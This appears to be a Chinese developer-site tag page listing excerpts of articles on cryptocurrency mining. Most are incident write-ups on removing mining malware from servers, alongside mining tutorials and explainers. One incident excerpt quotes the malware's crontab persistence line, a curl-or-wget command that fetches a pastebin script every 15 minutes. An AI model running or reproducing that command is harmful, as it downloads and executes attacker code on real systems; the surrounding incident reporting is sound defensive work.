51
Dev开发社区
首页
文章
问答
工具
搜索
登录
注册
#挖矿
记一次生产环境中挖矿病毒的处理
故障发现: 生产环境的服务无法访问,502错误。将k8s集群中的所有pod内存加起来达不到服务器实际物理内存的四分之一,而后根据top命令查出进程,再根据进程查文件,最后杀掉进程,k8s集群开始恢复正常。事后措施:修改ssh端口,修改密码,更新ssh免密文件。禁止root用户远程登陆,使用脚本进行防ssh爆破。总结:...
代码星球
·
2020-08-27
一次
生产
环境
中挖
病毒
记一次Xmrig挖矿木马排查过程
问题现象Linux服务器收到报警信息,主机CPU跑满。自动创建运行Docker容器xmrig,导致其他运行中容器被迫停止。问题原因通过top命令可以看到有一个xmrig进程占用了99%的CPU。经定位,该进程是一个挖矿木马程序,通过上述截图可以看到进程对应的PID为2647,根据进程ID查询一下产生进程的程序路径:ll...
代码星球
·
2020-04-18
一次
Xmrig
挖矿
木马
排查
挖矿-门罗币
https://wallet.mymonero.com一定要记好MNEMONIC,否则登不上钱包。https://www.f2pool.com/注册账号,找到对应币的挖矿软件也要查看矿池地址xmr-stak登录服务器,下载挖矿软件wget--no-check-certificatehttps://github.com/...
代码星球
·
2020-04-16
挖矿
-门
罗币
以太坊挖矿原理
以太坊的共识机制是PoW(ProofofWork工作量证明机制),使用的算法是Ethash,这种算法是对Dagger-Hashimoto算法的改良版本,流程大概如下1.对于每一个块,首先计算一个种子(seed),该种子只和当前块的信息有关;然后根据种子生成一个32M的随机数据集(cache)2.根据Cache生成一个1...
代码星球
·
2020-04-14
以太
坊挖
原理
服务器中了挖矿病毒
这几天阿里云云服务器cpu一直跑满,一查发现有个定时任务,在搜索一下,发现自己中毒了,原来前几天搞redis学习的时候设置了个弱密码,被ssh暴力破解植入病毒了。crontab-l*/15****(curl-fsSLhttps://pastebin.com/raw/v5XC0BJh||wget-q-O-https://...
代码星球
·
2020-04-14
服务器
中了
挖矿
病毒
Kworkerd恶意挖矿分析
转自:https://www.360zhijia.com/anquan/417114.html TOP显示CPU占用高,但是没有高占用的进程 存在与未知服务器13531端口建立的TCP连接 文件/etc/ld.so.preload中指向了/usr/local/lib/libntp.so&n...
代码星球
·
2020-04-12
Kworkerd
恶意
挖矿
分析
莱特币挖矿入门图文教程
1、首先下载挖矿工具: (1)挖矿代理:stratum_proxy 链接:http://pan.baidu.com/s/1jHHB7KU密码:3lx9 (2)CPU挖矿软件:pool...
代码星球
·
2020-04-12
莱特
币挖
入门
图文
教程
挖矿程序的工作原理(BTC为例)
Mining时代进化:CPU挖矿->GPU挖矿->FPGA挖矿->ASIC挖矿CPU挖矿时代:SENGENERATEGPU挖矿时代:GETWORKMiner:挖矿的程序或者机器统称矿工 挖矿本质:执行Hash函数的过程,而Hash函数是一个单输入单输出函数,输入数据就是一个区块头 ...
代码星球
·
2020-04-11
挖矿
程序
工作
原理
BTC
解决阿里云服务器提示挖矿程序风险
今天大早上收到阿里云邮件通知,提示有挖矿程序。一个激灵爬起来,折腾了一早上,终于解决问题了。 其实前两天就一直收到阿里云的通知,检测到对外攻击,阻断了对其他服务器6379、6380和22端口的访问,当时没怎么当一回儿事,反正是我用来自己学习用的,就放着不管了,结果今天事态就大了。那就来解决吧。 ...
代码星球
·
2020-04-11
解决
阿里
服务器
提示
挖矿
首页
上一页
1
2
下一页
尾页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他